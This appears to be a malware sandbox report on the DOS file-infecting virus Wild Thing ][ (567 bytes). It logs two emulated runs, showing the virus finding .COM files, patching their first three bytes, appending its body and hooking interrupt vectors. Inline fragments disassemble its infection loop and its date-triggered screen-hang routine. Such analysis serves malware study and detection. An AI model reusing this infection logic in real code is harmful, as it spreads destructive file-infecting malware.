Sample viewer

vx.netlux.org/Virus.DOS.WildThing.567

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:04:31.365833571Z 26 PC: 12c51 | Set disk transfer address
2018-12-17T23:04:31.367676541Z 44 PC: 12b0e | Get time 0x12b0e: cmp dh, 0
0x12b11: je 0x12b0a
0x12b13: mov byte ptr cs:[bp + 0x338], dh
0x12b18: mov ah, 0x47
0x12b1a: mov dl, 0
0x12b1c: lea si, word ptr [bp + 0x354]
0x12b20: int 0x21
0x12b22: call 0x12c13
0x12b25: call 0x12c37
0x12b28: mov ah, 0x4e
0x12b2a: lea dx, word ptr [bp + 0x2d4]
0x12b2e: mov cx, 7
0x12b31: int 0x21
0x12b33: jb 0x12b40
0x12b35: lea dx, word ptr [bp + 0x3b2]
0x12b39: call 0x12b75
0x12b3c: mov ah, 0x4f
0x12b3e: jmp 0x12b31
0x12b40: lea dx, word ptr [bp + 0x2ea]
0x12b44: mov ah, 0x3b
2018-12-17T23:04:31.370366084Z 71 PC: 12b22 | Get current directory
2018-12-17T23:04:31.373457124Z 42 PC: 12c17 | Get date 0x12c17: cmp al, 5
0x12c19: je 0x12c1c
0x12c1b: ret
0x12c1c: mov ah, 1
0x12c1e: mov cx, 0x2020
0x12c21: int 0x10
0x12c23: mov ah, 2
0x12c25: xor dx, dx
0x12c27: int 0x10
0x12c29: xor ax, ax
0x12c2b: int 0x10
0x12c2d: mov ah, 9
0x12c2f: lea dx, word ptr [bp + 0x27a]
0x12c33: int 0x21
0x12c35: jmp 0x12c35
0x12c37: mov ah, 0x4e
0x12c39: lea dx, word ptr [bp + 0x2da]
0x12c3d: mov cx, 7
0x12c40: int 0x21
0x12c42: jae 0x12c45
2018-12-17T23:04:31.376693646Z 78 PC: 12c42 | Find first file
2018-12-17T23:04:31.381809827Z 78 PC: 12b33 | Find first file
2018-12-17T23:04:31.385687715Z 67 PC: 12b7b | Get or set file attributes
2018-12-17T23:04:31.391103457Z 67 PC: 12b89 | Get or set file attributes
2018-12-17T23:04:31.417954596Z 61 PC: 12b90 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:04:31.444007311Z 87 PC: 12b98 | Get or set file date and time
2018-12-17T23:04:31.446079071Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:04:31.454105757Z 66 PC: 12c12 | Move file pointer
2018-12-17T23:04:31.455823691Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:04:31.467260972Z 66 PC: 12c12 | Move file pointer
2018-12-17T23:04:31.48425198Z 64 PC: 12d36 | Write file or device (Write 567 bytes on handle 5)
2018-12-17T23:04:31.492902827Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:04:31.505612119Z 62 PC: 12bfc | Close file
2018-12-17T23:04:31.514106324Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T23:04:31.524937257Z 79 PC: 12b33 | Find next file
2018-12-17T23:04:31.527657254Z 67 PC: 12b7b | Get or set file attributes
2018-12-17T23:04:31.535646935Z 67 PC: 12b89 | Get or set file attributes
2018-12-17T23:04:31.545501609Z 61 PC: 12b90 | Open file (Filename = 'PRINT.COM')
2018-12-17T23:04:31.55711162Z 87 PC: 12b98 | Get or set file date and time
2018-12-17T23:04:31.559365304Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:04:31.565644915Z 66 PC: 12c12 | Move file pointer
2018-12-17T23:04:31.567034029Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:04:31.570640113Z 66 PC: 12c12 | Move file pointer
2018-12-17T23:04:31.572492379Z 64 PC: 12d36 | Write file or device (Write 567 bytes on handle 5)
2018-12-17T23:04:31.58074401Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:04:31.582533323Z 62 PC: 12bfc | Close file
2018-12-17T23:04:31.590717903Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T23:04:31.601152879Z 79 PC: 12b33 | Find next file
2018-12-17T23:04:31.604171573Z 67 PC: 12b7b | Get or set file attributes
2018-12-17T23:04:31.625804821Z 67 PC: 12b89 | Get or set file attributes
2018-12-17T23:04:31.645614168Z 61 PC: 12b90 | Open file (Filename = 'HELLO.COM')
2018-12-17T23:04:31.65240725Z 87 PC: 12b98 | Get or set file date and time
2018-12-17T23:04:31.655007478Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:04:31.661448036Z 66 PC: 12c12 | Move file pointer
2018-12-17T23:04:31.663109435Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:04:31.666593432Z 66 PC: 12c12 | Move file pointer
2018-12-17T23:04:31.668103821Z 64 PC: 12d36 | Write file or device (Write 567 bytes on handle 5)
2018-12-17T23:04:31.676346102Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:04:31.678907019Z 62 PC: 12bfc | Close file
2018-12-17T23:04:31.687521401Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T23:04:31.697216858Z 79 PC: 12b33 | Find next file
2018-12-17T23:04:31.700509943Z 67 PC: 12b7b | Get or set file attributes
2018-12-17T23:04:31.70634257Z 67 PC: 12b89 | Get or set file attributes
2018-12-17T23:04:31.71640121Z 61 PC: 12b90 | Open file (Filename = 'PHANG.COM')
2018-12-17T23:04:31.728154082Z 87 PC: 12b98 | Get or set file date and time
2018-12-17T23:04:31.729950644Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:04:31.736692132Z 66 PC: 12c12 | Move file pointer
2018-12-17T23:04:31.739758653Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:04:31.743010297Z 66 PC: 12c12 | Move file pointer
2018-12-17T23:04:31.745272689Z 64 PC: 12d36 | Write file or device (Write 567 bytes on handle 5)
2018-12-17T23:04:31.754109928Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:04:31.756917512Z 62 PC: 12bfc | Close file
2018-12-17T23:04:31.764743743Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T23:04:31.774728228Z 79 PC: 12b33 | Find next file
2018-12-17T23:04:31.77867404Z 67 PC: 12b7b | Get or set file attributes
2018-12-17T23:04:31.784315546Z 67 PC: 12b89 | Get or set file attributes
2018-12-17T23:04:31.794213096Z 61 PC: 12b90 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T23:04:31.801841118Z 87 PC: 12b98 | Get or set file date and time
2018-12-17T23:04:31.80385521Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:04:31.810301823Z 66 PC: 12c12 | Move file pointer
2018-12-17T23:04:31.812736559Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:04:31.815946053Z 66 PC: 12c12 | Move file pointer
2018-12-17T23:04:31.817905294Z 64 PC: 12d36 | Write file or device (Write 567 bytes on handle 5)
2018-12-17T23:04:32.274146399Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:04:32.276484305Z 62 PC: 12bfc | Close file
2018-12-17T23:04:32.296359639Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T23:04:32.31707612Z 79 PC: 12b33 | Find next file
2018-12-17T23:04:32.321335825Z 67 PC: 12b7b | Get or set file attributes
2018-12-17T23:04:32.327126932Z 67 PC: 12b89 | Get or set file attributes
2018-12-17T23:04:32.343756092Z 61 PC: 12b90 | Open file (Filename = 'MANDEL.COM')
2018-12-17T23:04:32.358185165Z 87 PC: 12b98 | Get or set file date and time
2018-12-17T23:04:32.360061214Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:04:32.366994597Z 66 PC: 12c12 | Move file pointer
2018-12-17T23:04:32.369696521Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:04:32.372508168Z 66 PC: 12c12 | Move file pointer
2018-12-17T23:04:32.374578726Z 64 PC: 12d36 | Write file or device (Write 567 bytes on handle 5)
2018-12-17T23:04:32.391412226Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:04:32.393470894Z 62 PC: 12bfc | Close file
2018-12-17T23:04:32.417189589Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T23:04:32.43840522Z 79 PC: 12b33 | Find next file
2018-12-17T23:04:32.442337309Z 67 PC: 12b7b | Get or set file attributes
2018-12-17T23:04:32.448551925Z 67 PC: 12b89 | Get or set file attributes
2018-12-17T23:04:32.469937177Z 61 PC: 12b90 | Open file (Filename = 'PAH.COM')
2018-12-17T23:04:32.477562508Z 87 PC: 12b98 | Get or set file date and time
2018-12-17T23:04:32.479339583Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:04:32.487470483Z 66 PC: 12c12 | Move file pointer
2018-12-17T23:04:32.489844795Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:04:32.492974146Z 66 PC: 12c12 | Move file pointer
2018-12-17T23:04:32.495734389Z 64 PC: 12d36 | Write file or device (Write 567 bytes on handle 5)
2018-12-17T23:04:32.515060157Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:04:32.516959835Z 62 PC: 12bfc | Close file
2018-12-17T23:04:32.536202707Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T23:04:32.578592751Z 79 PC: 12b33 | Find next file
2018-12-17T23:04:32.581778185Z 67 PC: 12b7b | Get or set file attributes
2018-12-17T23:04:32.590853369Z 67 PC: 12b89 | Get or set file attributes
2018-12-17T23:04:32.624398262Z 61 PC: 12b90 | Open file (Filename = 'TEST.COM')
2018-12-17T23:04:32.632841301Z 87 PC: 12b98 | Get or set file date and time
2018-12-17T23:04:32.634773195Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:04:32.642781621Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:04:32.644532311Z 62 PC: 12bfc | Close file
2018-12-17T23:04:32.677133796Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T23:04:32.726042542Z 79 PC: 12b33 | Find next file
2018-12-17T23:04:32.728464707Z 59 PC: 12b48 | Change current directory
2018-12-17T23:04:32.731773954Z 59 PC: 12b52 | Change current directory
2018-12-17T23:04:32.735263683Z 26 PC: 12c51 | Set disk transfer address
2018-12-17T23:04:32.737512511Z 9 PC: 12ae1 | Display string (String= 'YAM - Youngsters Against McAfee Proudly Presents Wild Thing ][ Programmed by Admiral Bailey ')
2018-12-17T23:04:32.743355533Z 76 PC: 12ae6 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":14903,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:42:04.670951438Z 26 PC: 12c51 | Set disk transfer address
2018-12-25T12:42:04.672544519Z 44 PC: 12b0e | Get time 0x12b0e: cmp dh, 0
0x12b11: je 0x12b0a
0x12b13: mov byte ptr cs:[bp + 0x338], dh
0x12b18: mov ah, 0x47
0x12b1a: mov dl, 0
0x12b1c: lea si, word ptr [bp + 0x354]
0x12b20: int 0x21
0x12b22: call 0x12c13
0x12b25: call 0x12c37
0x12b28: mov ah, 0x4e
0x12b2a: lea dx, word ptr [bp + 0x2d4]
0x12b2e: mov cx, 7
0x12b31: int 0x21
0x12b33: jb 0x12b40
0x12b35: lea dx, word ptr [bp + 0x3b2]
0x12b39: call 0x12b75
0x12b3c: mov ah, 0x4f
0x12b3e: jmp 0x12b31
0x12b40: lea dx, word ptr [bp + 0x2ea]
0x12b44: mov ah, 0x3b
2018-12-25T12:42:04.674690341Z 71 PC: 12b22 | Get current directory
2018-12-25T12:42:04.677530232Z 42 PC: 12c17 | Get date 0x12c17: cmp al, 5
0x12c19: je 0x12c1c
0x12c1b: ret
0x12c1c: mov ah, 1
0x12c1e: mov cx, 0x2020
0x12c21: int 0x10
0x12c23: mov ah, 2
0x12c25: xor dx, dx
0x12c27: int 0x10
0x12c29: xor ax, ax
0x12c2b: int 0x10
0x12c2d: mov ah, 9
0x12c2f: lea dx, word ptr [bp + 0x27a]
0x12c33: int 0x21
0x12c35: jmp 0x12c35
0x12c37: mov ah, 0x4e
0x12c39: lea dx, word ptr [bp + 0x2da]
0x12c3d: mov cx, 7
0x12c40: int 0x21
0x12c42: jae 0x12c45
2018-12-25T12:42:04.680842348Z 78 PC: 12c42 | Find first file
2018-12-25T12:42:04.686828776Z 78 PC: 12b33 | Find first file
2018-12-25T12:42:04.698053628Z 67 PC: 12b7b | Get or set file attributes
2018-12-25T12:42:04.70949584Z 67 PC: 12b89 | Get or set file attributes
2018-12-25T12:42:04.738639335Z 61 PC: 12b90 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:42:04.745525449Z 87 PC: 12b98 | Get or set file date and time
2018-12-25T12:42:04.747428507Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:42:04.763466914Z 66 PC: 12c12 | Move file pointer
2018-12-25T12:42:04.764982744Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:42:04.767718811Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:04.770303054Z 64 PC: 12d36 | Write file or device (Write 567 bytes on handle 5)
2018-12-25T12:42:04.779682292Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T12:42:04.781442862Z 62 PC: 12bfc | Close file
2018-12-25T12:42:04.789753502Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T12:42:04.799675941Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:04.802544759Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:04.808886375Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:04.818901424Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:04.830318131Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:04.832524447Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:04.839430532Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:04.841053087Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:04.845030128Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:04.846988428Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:04.858621893Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:04.86104418Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:04.868748479Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:04.878434963Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:04.881975368Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:04.887546664Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:04.897128253Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:04.909118441Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:04.910637006Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:04.917083418Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:04.919029908Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:04.921760767Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:04.923613901Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:04.932064064Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:04.933995636Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:04.942193613Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:04.952097179Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:04.955912659Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:04.961679736Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:04.97182661Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:04.97953828Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:04.9811369Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:04.990354812Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:04.992897847Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:04.996071635Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:04.997963402Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:05.00685019Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:05.008811918Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:05.016544212Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:05.027013834Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:05.030522473Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:05.036864527Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:05.046641316Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:05.054206163Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:05.055781011Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:05.062201581Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:05.064137447Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:05.066973307Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:05.068841146Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:05.077629672Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:05.078983057Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:05.08652282Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:05.097571535Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:05.1002811Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:05.106422989Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:05.116830299Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:05.123727823Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:05.125234203Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:05.132321936Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:05.134084435Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:05.136831985Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:05.139342783Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:05.148442295Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:05.150056384Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:05.157889839Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:05.168773557Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:05.171484239Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:05.177157842Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:05.188123105Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:05.194729203Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:05.196232582Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:05.20358077Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:05.205090442Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:05.207817649Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:05.210541255Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:05.218722975Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:05.220341866Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:05.229156515Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:05.239127731Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:05.241905304Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:05.248079512Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:05.257731356Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:05.264372904Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:05.26646339Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:05.272749045Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:05.27438337Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:05.284138375Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:05.296627096Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:05.299152073Z 59 PC: 12b48 | Change current directory
2018-12-25T12:42:05.304070595Z 59 PC: 12b52 | Change current directory
2018-12-25T12:42:05.306312989Z 26 PC: 12c51 | Set disk transfer address (See above)
2018-12-25T12:42:05.307591325Z 9 PC: 12b6a | Display string (String= 'Wild Thing ][ ')
2018-12-25T12:42:07.502888185Z 72 PC: 8f1b9 | Allocate memory
2018-12-25T12:42:07.505281521Z 72 PC: 8f1bd | Allocate memory
2018-12-25T12:42:07.507814197Z 99 PC: 90858 | Get DBCS lead byte table pointer
2018-12-25T12:42:07.511742133Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\HIMEM.SYS')
2018-12-25T12:42:07.522657002Z 66 PC: 91f95 | Move file pointer
2018-12-25T12:42:07.524765671Z 62 PC: 91fc1 | Close file
2018-12-25T12:42:07.527292275Z 75 PC: 91fe0 | Execute program
2018-12-25T12:42:07.54371798Z 98 PC: 916f1 | Get current PSP
2018-12-25T12:42:07.545243428Z 9 PC: c605 | Display string (String= '6��r�&;] u')
2018-12-25T12:42:07.549623401Z 48 PC: c609 | Get DOS version
2018-12-25T12:42:07.554091668Z 9 PC: c382 | Display string (String= ' Installed A20 handler number ')
2018-12-25T12:42:07.556736159Z 2 PC: c38c | Character output (Char = '32')
2018-12-25T12:42:07.559136777Z 2 PC: c3a7 | Character output (Char = '2e')
2018-12-25T12:42:07.563806258Z 9 PC: c6d9 | Display string (String= '�����VH�VD���V@��������������_���Ku��t1��������D�����t �� ��������a1��Z�����W���� ������5���|�����(���������Nj�(��������p�^')
2018-12-25T12:42:07.568344462Z 9 PC: c6e0 | Display string (String= '�5���|�����(���������Nj�(��������p�^')
2018-12-25T12:42:07.573106447Z 61 PC: 91f88 | Open file (See above)
2018-12-25T12:42:07.584341522Z 66 PC: 91f95 | Move file pointer (See above)
2018-12-25T12:42:07.58601363Z 62 PC: 91fc1 | Close file (See above)
2018-12-25T12:42:07.588298018Z 75 PC: 91fe0 | Execute program (See above)
2018-12-25T12:42:07.609249876Z 98 PC: 916f1 | Get current PSP (See above)
2018-12-25T12:42:07.613619408Z 82 PC: 13d46 | Get DOS internal pointers (SYSVARS)
2018-12-25T12:42:07.615231923Z 53 PC: 13ac3 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:42:07.617334974Z 37 PC: 13ad6 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:42:07.618648375Z 53 PC: 13ae0 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:07.620370389Z 37 PC: 13af3 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:07.62211274Z 9 PC: 13a0d | Display string (Could not find end pointer)
2018-12-25T12:42:07.630149115Z 62 PC: 8f8eb | Close file
2018-12-25T12:42:07.632881097Z 62 PC: 8f8f2 | Close file
2018-12-25T12:42:07.635909263Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.639846237Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.641563331Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.643459324Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.645948829Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.647617993Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.649107492Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.65210435Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.65377618Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.655472809Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.658101356Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.659782701Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.661467093Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.664115926Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.665815481Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.667484645Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.67009241Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.674159141Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.675524063Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.677665308Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.679033754Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.6803524Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.682710855Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.684052734Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.685482677Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.687898716Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.689242197Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.69063791Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.692886875Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.694223159Z 61 PC: 8f8ff | Open file (Filename = '')
2018-12-25T12:42:07.698820354Z 62 PC: 8f90e | Close file
2018-12-25T12:42:07.700677104Z 69 PC: 8f915 | Duplicate handle
2018-12-25T12:42:07.703922279Z 69 PC: 8f919 | Duplicate handle
2018-12-25T12:42:07.705464787Z 61 PC: 9387b | Open file (Filename = '')
2018-12-25T12:42:07.709875481Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-25T12:42:07.711724538Z 61 PC: 9387b | Open file (See above)
2018-12-25T12:42:07.717528443Z 68 PC: 9386b | I/O control for devices (See above)
2018-12-25T12:42:07.719325079Z 74 PC: 8f9c4 | Reallocate memory
2018-12-25T12:42:07.721572363Z 72 PC: 8f9e0 | Allocate memory
2018-12-25T12:42:07.723118198Z 72 PC: 8f9e4 | Allocate memory
2018-12-25T12:42:07.724471715Z 74 PC: 8f9fb | Reallocate memory
2018-12-25T12:42:07.727231977Z 72 PC: 8fa02 | Allocate memory
2018-12-25T12:42:07.729016946Z 72 PC: 8fa06 | Allocate memory
2018-12-25T12:42:07.730535004Z 73 PC: 8fa11 | Release memory
2018-12-25T12:42:07.733180216Z 73 PC: 8efea | Release memory
2018-12-25T12:42:07.734375826Z 74 PC: 8f003 | Reallocate memory
2018-12-25T12:42:07.735815806Z 72 PC: 8f054 | Allocate memory
2018-12-25T12:42:07.738896352Z 72 PC: 8f058 | Allocate memory
2018-12-25T12:42:07.740564719Z 73 PC: 8f060 | Release memory
2018-12-25T12:42:07.742143346Z 61 PC: 8f080 | Open file (Filename = '')
2018-12-25T12:42:07.751475353Z 63 PC: 8f095 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:42:07.757049966Z 66 PC: 8f0ad | Move file pointer
2018-12-25T12:42:07.758689167Z 62 PC: 8f0d1 | Close file
2018-12-25T12:42:07.761855183Z 75 PC: 8f0f2 | Execute program
2018-12-25T12:42:07.783824447Z 80 PC: 12be9 | Set current PSP
2018-12-25T12:42:07.785133915Z 48 PC: 12bee | Get DOS version
2018-12-25T12:42:07.787190471Z 99 PC: 193d0 | Get DBCS lead byte table pointer
2018-12-25T12:42:07.79007226Z 101 PC: 12c74 | Get extended country info
2018-12-25T12:42:07.791429631Z 99 PC: 12c7a | Get DBCS lead byte table pointer
2018-12-25T12:42:07.793598218Z 74 PC: 12cdc | Reallocate memory
2018-12-25T12:42:07.7950172Z 72 PC: 1355d | Allocate memory
2018-12-25T12:42:07.796537618Z 25 PC: 13596 | Get default drive
2018-12-25T12:42:07.798078242Z 71 PC: 135ad | Get current directory
2018-12-25T12:42:07.800599611Z 59 PC: 135ba | Change current directory
2018-12-25T12:42:07.806348824Z 59 PC: 135c8 | Change current directory
2018-12-25T12:42:07.812686174Z 59 PC: 135d3 | Change current directory
2018-12-25T12:42:07.81631509Z 25 PC: 12d13 | Get default drive
2018-12-25T12:42:07.817848439Z 37 PC: 127d3 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-25T12:42:07.81928215Z 37 PC: 127da | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T12:42:07.820532837Z 37 PC: 127e1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:42:07.823477713Z 80 PC: 1301d | Set current PSP
2018-12-25T12:42:07.824534994Z 37 PC: 13041 | Set interrupt vector (Interrupt = '46' AKA 'Set verify flag')
2018-12-25T12:42:07.825956109Z 53 PC: 13362 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:07.827965417Z 37 PC: 13383 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:07.829337474Z 51 PC: 13417 | Get or set Ctrl-Break
2018-12-25T12:42:07.831422045Z 72 PC: 130ec | Allocate memory
